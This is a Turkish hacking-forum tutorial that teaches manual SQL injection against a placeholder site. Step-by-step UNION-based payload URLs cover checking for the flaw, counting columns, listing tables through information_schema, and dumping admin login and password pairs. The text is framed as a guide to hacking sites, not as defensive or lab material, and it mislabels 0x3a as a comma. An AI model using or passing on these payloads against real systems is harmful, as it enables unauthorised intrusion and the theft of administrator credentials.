#5 l SQL İnjection Manual Hacking

Konu : // SQL İnjection Manual Hacking // AquieLL 

Başlayalım...

Elimizde Bir Site Var SQL Açıklı Olup Olmadığını Anlamak İçin İD=1 değerinin Sonuna " 'a " Ekliyoruz.
Karşımıza Şöyle Bir Hata Benzeri Bir Hata Çıkarsa Site SQL Açıklı Bir Sitedir.

Kod:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Kod:

www.örneksite.com/hack.php?id=1

Biz SQL Hatamızı Aldık ve İlk Aşamamız Siteye "+order+by+ "
Komutunu Çalıştırmaktır. Hangi Order+by Komutunda SQL Hatamız Kalkarsa Kolon Sayımız O Sayıdır.

Sitenin Sonuna "+order+by+1 , +order+by+2 vb" Ekleyelim. Yani ;

Kod:

www.örneksite.com/hack.php?id=1+order+by+1 (Hala SQL Hatası Var)

Kod:

www.örneksite.com/hack.php?id=1+order+by+2 (Hala SQL Hatası Var)

Kod:

www.örneksite.com/hack.php?id=1+order+by+3 (Hala SQL Hatası Var)

Kod:

www.örneksite.com/hack.php?id=1+order+by+4 (SQL Hatamız Kalktı.

Kod:

www.örneksite.com/hack.php?id=1+order+by+5 (Hala SQL Hatası Var)

Böylece Kolon Sayımızın 4 Olduğunu Bulduk.

Şimdiki Aşamamız Siteye "+union+all+select" Komutunu Çalıştırmaktır.İd Değerinin Sonuna Kolon Sayımız 4 Olduğu İçin
Site Sonunu 4'e Kadar Yazıyoruz."+union+all+select+1,2,3,4" yani ;

Kod:

www.örneksite.com/hack.php?id=1+union+all+select+1,2,3,4

Şurada Kolon Sayısından Sonrasına : (Yani 4'den Sonrasına) " -- " Koyuyoruz.
İD Değerinden Öncesine : ( Yani İD=1'den Öncesine " id=-1 "

Kod:

www.örneksite.com/hack.php?id=-1+union+all+select+1,2,3,4--

Şimdi Ekrana Bir Sayı Çıkacak.Mesela 2 Sayısı Ekrana Geldi Site URL'mizde ;
2 Sayısının Yerine = group_concat(table_name) 
Url En Sonuna'da = +from+information_schema.tables+where+table_schema =database()
NOT:Ekranda Sayıları Gördükten Sonra " -- " ve " - " İşaretlerini Siliyoruz.
Yani ;

Kod:

www.örneksite.com/hack.php?id=1+union+all+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()

Ekrana Tableler Gelicek,Bize Şuradan admin,adminuser gibi tableler Lazım olucak,mesela admin seçelim..
Şimdi Sitenin Sonuna Yazdığımız Kodu Şöyle Değişelim:

Kod:

+union+all+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(hacklenmiş table kodu)--

Şimdi Tabloları Hacklemek İçin Bir Site'den Yardım Alacağız
Site: https://www.easycalculation.com/ascii-hex.php

Hacklemek İstediğimiz Tablo İsmini String Bölümüne Yazıyoruz.Admini Seçtiğimiz İçin Biz Admin Yazacağız. Yazdık Ve Bize kodu Verdi.

KOD : 97 100 109 105 110

Ve Artık Site Sonuna Yazacağımız Kod Şöyle Oluyor ;

Kod:

+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+seçdiğimiz table--

Bizim Seçdiğimiz Table admin Tablesi Olduğu İçin Kod Şöyle Oluyor.
Not:Şunuda Söyleyelimki login ve pass Arasında Yazdığımız 0x3a "," demek Ve Onu Mutlaka Yazmalısınız.

Ve Son Kodumuzu Yazıyoruz ve Admin Bilgileri Ekrana Geliyor... ;

Kod:

+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+admin--

ve TAM Siteli Olan Hali ;

Kod:

www.örneksite.com/hack.php?id=1+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+admin-